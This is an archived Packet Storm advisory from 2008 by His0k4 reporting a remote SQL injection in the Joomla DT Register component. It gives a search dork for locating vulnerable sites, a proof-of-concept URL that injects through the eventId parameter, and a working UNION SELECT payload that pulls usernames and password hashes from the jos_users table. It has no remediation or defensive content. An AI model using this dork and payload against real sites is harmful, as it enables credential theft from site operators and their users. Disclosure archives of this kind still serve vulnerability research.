joomladtr-sql.txt

2008-07-16T00:00:00
ID PACKETSTORM:68242
Type packetstorm
Reporter His0k4
Modified 2008-07-16T00:00:00

Description

                                        
                                            `/---------------------------------------------------------------\  
\ /  
/ Joomla Component DT Register Remote SQL injection \  
\ /  
\---------------------------------------------------------------/  
  
  
[*] Author : His0k4 [ALGERIAN HaCkeR]  
  
[*] Dork : inurl:com_DTRegister eventId  
  
[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html  
  
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}  
  
[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138  
  
[*] Greetings : All friends & muslims HaCkeRs  
www.dz-secure.com  
  
----------------------------------------------------------------------------  
  
`